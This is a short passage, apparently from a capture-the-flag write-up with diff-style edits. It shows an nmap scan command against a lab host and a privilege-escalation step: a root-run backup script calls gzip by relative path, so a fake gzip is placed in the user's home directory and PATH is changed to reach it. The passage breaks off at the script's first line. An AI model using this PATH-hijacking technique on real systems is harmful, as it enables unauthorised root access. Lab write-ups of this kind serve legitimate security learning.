Nmap 7.91 scan initiated Thu Aug 12 12:27:49 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.10.11.104

 Privilege Escalation

-by its relative path name and it is being called as root.
-I should be able to inject a malicious gzip
+The backup script is calling gzip by its relative path name and it is being called as root.
+I should be able to inject a malicious gzip via the $PATH variable.

 PATH=/home/m4lwhere:$PATH

-I create the file /home/m4lwhere/gzip
+I create the file /home/m4lwhere/gzip.

 #!/bin/bash